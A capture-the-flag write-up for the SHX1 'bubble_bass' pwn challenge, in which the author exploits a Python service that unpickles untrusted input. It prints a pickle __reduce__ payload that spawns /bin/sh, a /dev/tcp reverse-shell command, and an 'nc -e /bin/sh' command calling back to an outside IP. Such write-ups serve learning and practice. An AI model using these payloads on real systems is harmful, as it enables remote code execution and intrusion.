SHX1 : pwn300-bubble_bass

Bubble Bass has a vulnerable service. Can you exploit it and read the flag.txt file?
Server: 34.197.58.21
Port: 9997
Category: Potent PwnablesPoints: 300
Given clue:
self.received = self.request.recv(1024).strip()
self.result = cPickle.loads(self.received)

Solution

Connected to the server..

..the server asks me to add two numbers, and quits w/ 1 second timeout, no time to manually reply.

No problem, wrote a py socket script...

Now clearly its a Caesar cipher.

Solved w/ my caesar deco..

Caesar... rot=20

Now comes the real challenge..

..the server asks me for a file, tried flag.txt, of course no success.. everything containing *flag* returns Really? Maybe next time..

Okay, back to the given clue:

self.received = self.request.recv(1024).strip()  
self.result = cPickle.loads(self.received)  

hmm.. bubble bass.. pickles.. spongebob? hehe..

Found this:

Tried the test exploit:

class RunBinSh(object):  
  def __reduce__(self):
    return (subprocess.Popen, (('/bin/sh',),))

..and got the Server received message from the server, but no shell.. we can't see the server raw output, but im on the right way 4 sure..

Started nc server locally nc -vv -l -p 6888 to wait for connections and tried to execute on server side the classic /bin/sh </dev/tcp/175.14.11.121/6888 >&0 2>&0, no success.. the server accept my command but no connection here, maybe some filtering..

Ok, lets test if nc is enabled on server side.. nc -e /bin/sh 175.14.11.121 6888

Wow!
we got a reverse shell..
now just cat flag.txt 4 the win!

Flag: shellter{CENSORED}

Awesome contest shellterlabs.com.
I arrived too late and could not could not try the other challs, but the next one can count on me :)

Final exploit